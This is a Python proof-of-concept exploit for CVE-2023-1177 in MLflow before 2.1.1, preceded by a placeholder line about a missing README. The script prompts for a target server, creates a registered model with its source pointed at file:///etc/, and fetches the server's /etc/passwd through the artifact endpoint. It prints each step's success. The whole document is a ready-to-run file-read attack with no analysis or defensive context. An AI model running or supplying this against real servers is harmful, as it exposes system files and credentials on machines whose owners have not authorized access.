README.md
README.md not found for CVE-2023-1177. The file may not exist in the repository.
import requests
import os,sys
import uuid
import json
import time
#generating unique id
os.system("clear")
print("= CVE-2023-1177 =\n MLflow < 2.1.1 \n===================\n")
print ("Enter the IP or Hostname of the server:")
hostname_or_ip=input()
server=str(hostname_or_ip)
print ("Exploitation on: "+server)
time.sleep(2)
#Generate unique id for model name
name=str(uuid.uuid4())
print ("[+] Generated Unique model name: "+name)
time.sleep(1)
create_model_url = "http://"+server+"/ajax-api/2.0/mlflow/registered-models/create"
update_model_url = "http://"+server+"/ajax-api/2.0/mlflow/model-versions/create"
get_data_url = "http://"+server+"/model-versions/get-artifact?path=passwd&name="+name+"&version=1"
data = {"name":name}
payload = {"name":name,"source":"file:///etc/"}
#Create model
print ("[+] Creating model")
time.sleep(1)
response_create_model = requests.post(create_model_url,json=data)
if (response_create_model.status_code==200):
print ("[+] Successful! ")
time.sleep(2)
#Updating model
print ("[+] Updating model ")
time.sleep(1)
response_update_model = requests.post(update_model_url,json=payload)
if (response_update_model.status_code==200):
print ("[+] Successful! ")
time.sleep(2)
#Fething content of /etc/passwd file
print ("[+] Fetching content of /etc/passwd file")
time.sleep(1)
response_get_data = requests.get(get_data_url)
if (response_get_data.status_code==200):
print ("[+] Success!")
print(response_get_data.text)